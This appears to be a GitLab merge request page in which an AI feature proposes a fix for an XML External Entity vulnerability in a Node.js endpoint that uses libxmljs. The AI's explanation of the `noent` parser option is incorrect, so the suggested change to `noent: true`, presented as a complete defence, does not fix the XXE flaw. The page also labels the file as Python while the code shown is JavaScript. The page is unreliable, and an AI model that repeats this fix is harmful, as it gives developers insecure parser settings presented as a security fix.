Resolve vulnerability: Improper restriction of XML external entity reference

David Pisekrequested to merge
remediate/improper-restriction-of-xml-external-entity-reference-D20250422T074503 into sming-gitlab-main-patch-7c3b

Vulnerability finding detected in merge request: Update file cwe-209-base.py (!45) • Unassigned

AI GENERATED FIX

The suggested code changes were generated by GitLab Duo Vulnerability Resolution, an AI feature. Use this feature with caution. Before you run a pipeline or apply the code changes, carefully review and test them, to ensure that they solve the vulnerability.

The large language model that generated the suggested code changes was provided with the entire file that contains the vulnerable lines of code. It is not aware of any functionality outside of this context.

Please see our documentation for more information about this feature and leave feedback in this issue.

Description:

User controlled data in XML parsers can result in XML External or Internal Entity (XXE) Processing vulnerabilities

Analysis:

The vulnerability report identifies an XML External Entity (XXE) vulnerability (CWE-611) in the code. This is a serious security issue where an attacker can exploit XML parsers to access unauthorized data, perform server-side request forgery, or execute denial of service attacks.

Looking at the code, the application uses the libxmljs library to parse XML input from users. The vulnerability occurs in the /parse-xml endpoint where user-provided XML is parsed.

The key issue is in the configuration of the XML parser. While many security options are set correctly (like nonet: true, dtdload: false), the noent option is explicitly set to false. In libxmljs, the noent option controls whether entity references are expanded. When set to false, it allows entity expansion, which is the core mechanism of XXE attacks.

Even though other protections are in place (like disabling DTD loading with dtdload: false), having noent: false could still potentially allow certain types of entity expansion that might lead to security issues.

The proper fix would be to set noent: true to disable entity expansion completely, which would prevent XXE attacks.

Summary:

XML External Entity (XXE) Vulnerability Fix

Vulnerability

The code was vulnerable to XML External Entity (XXE) attacks (CWE-611), which is listed in the OWASP Top 10 as A4:2017 and part of A05:2021 Security Misconfiguration. XXE vulnerabilities allow attackers to read sensitive files, perform server-side request forgery, or execute denial of service attacks by manipulating XML input.

Fix

The fix changes the noent option from false to true in the XML parsing configuration:

const xmlDoc = libxmljs.parseXml(xmlString, {
    noent: true,  // Changed from false to true
    // other options remain the same
});

This change prevents the expansion of entity references in XML documents, which is the primary mechanism for XXE attacks. By setting noent: true, the parser will not substitute entity references with their values, effectively blocking XXE attacks.

While the code already had some protections in place (like dtdload: false and nonet: true), the explicit setting of noent: true provides a more comprehensive defense against XXE vulnerabilities by ensuring that entity expansion is completely disabled.

Identifiers:

  • NodeJS Scan ID javascript-xml-rule-node_xxe
  • A05:2021 - Security Misconfiguration
  • A4:2017 - XML External Entities (XXE)
  • nodejs_scan.javascript-xml-rule-node_xxe
  • CWE-611

Merge request reports